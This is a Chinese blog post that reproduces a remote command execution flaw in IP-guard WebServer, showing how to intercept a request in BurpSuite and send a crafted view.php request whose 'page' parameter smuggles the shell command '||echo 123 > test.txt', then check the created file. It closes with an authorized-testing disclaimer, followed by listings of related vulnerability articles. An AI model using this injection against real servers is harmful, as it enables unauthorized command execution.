IP-guard远程命令执行漏洞

已于 2023-11-13 22:34:13 修改
阅读量183 收藏
点赞数
文章标签: tcp/ip 网络协议 网络
于 2023-11-11 17:16:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50607688/article/details/134350597
版权

这里写自定义目录标题

使用工具:BurpSuite(需配置好https抓包)

教程

https://blog.csdn.net/m0_63100066/article/details/128355365

漏洞复现

打开BurpSuite内置浏览器

在这里插入图片描述
##在浏览器中输入漏洞URL
在这里插入图片描述

对数据包进行拦截

在这里插入图片描述

在登录处随便输入账号密码,点击登录

在这里插入图片描述
可以看到抓取的数据包
在这里插入图片描述
对数据包进行修改
在这里插入图片描述
点击Repeater
在这里插入图片描述
构造参数
POST /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+123+>+test.txt HTTP/1.1
(参数是创建一个test.txt,并在txt文件中输入123)
在这里插入图片描述
点击Send进行发送
在这里插入图片描述

验证一下,访问文件

POST /ipg/static/appr/lib/flexpaper/php/test.txt HTTP/1.1

在这里插入图片描述

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。

夏花001
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IP-guard Web系统远程命令执行漏洞说明
IP-Guard专栏
11-21 1038
漏洞修补程序,可用于使用任意IP-guard版本环境的Web系统执行修复,修补程序会根据当前系统中安装的web系统执行相应的修复处理;近期收到反馈,IP-guard Web服务器存在远程命令执行漏洞(RCE),经过分析,确认是因为Web系统的申请审批功能使用了开源插件 flexpaper 实现文件在线预览功能,此插件存在远程代码执行漏洞。使用完整更新包会同时更新所有Web系统使用的组件,为减少更新Web系统带来的兼容性影响,需要根据当前使用的IP-guard版本采取不同的更新方式。使用漏洞修补程序处理。
IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)
0xSec
04-18 1025
2024年4月,互联网上披露IP-guardWebServer权限绕过漏洞情报,攻击者可利用该漏洞读取配置文件,获取数据库权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞
IP-guard 远程命令执行漏洞
m0_62172162的博客
12-19 181
IP-guard 远程命令执行漏洞
IP-guard Webserver view 远程命令执行漏洞【2023最新漏洞
holyxp的博客
11-12 2511
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard WebServer 2024年两个漏洞简单分析
最新发布
A345545108的博客
05-01 1187
这个漏洞看完索然无味,但是手上又刚好有源码,不看他一下又觉得可惜。
IP-guard WebServer RCE漏洞复现
0xSec
11-09 2780
IP-guard WebServer存在远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。
IP-guard 双机热备使用说明
10-10
双机热备使用说明 一、简介 服务器双机热备功能把主从服务器、数据库分别部署到 3 台机器上,实现主-从服务器 共享一个数据库,并且保持三者之间的通讯。当主服务器出现故障时,从服务器能及时响应 ...
IP-guard卸载工具
04-12
IP-guard上网行为管理,可以用这个工具卸载; 内容仅供学习交流,任何人不得将其用于非法用途,否则后果自行承担! * 运行`patched/Agt3Tool.exe`,选择卸载客户端->生成操作码->输入任意确认码->确定 * 运行`patched...
IP-Guard初级工程师认证培训资料
01-08
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP...
IP-Guard上机练习题2020.docx
05-02
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP...
IP-guard产品测试用例(全模块).pdf
02-14
IP-guard桌面管理系统,运用全面而细致地从文档操作管理、即时通讯、邮件管控、资产管理、移动存储设备、上网行为管理、屏幕监控、系统管理等方面进行详尽细致审计、全面严格管控和安全稳定的加密,满足企业防止信息...
IP_Guard_全面破解方法
10-12
IP_Guard_全面破解方法。IP_Guard_全面破解方法。IP_Guard_全面破解方法
漏洞复现--IP-guard flexpaper RCE
qq_53003652的博客
11-13 642
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。ping后加上dnslog验证。
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
wecanning的博客
11-10 656
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
IP-guard WebServer 远程命令执行漏洞复现(0day)】
一纸荒芜的博客
11-10 3020
IP-guard Webserver远程命令执行漏洞(RCE)漏洞复现
IP-Guard Webserver 远程命令执行漏洞(含批量验证poc)
2401_84418977的博客
04-17 418
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
IP-guard getdatarecord 存在任意文件读取
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
04-21 854
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
ip-guard教程
11-26
IP-Guard 是一种网络安全软件,它可以帮助管理者监控和保护公司内部网络,防止未经授权的访问和数据泄露。下面是一个简单的 IP-Guard 教程,帮助你更好地了解这个软件的使用方法。 首先,你需要下载并安装 IP-Guard...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值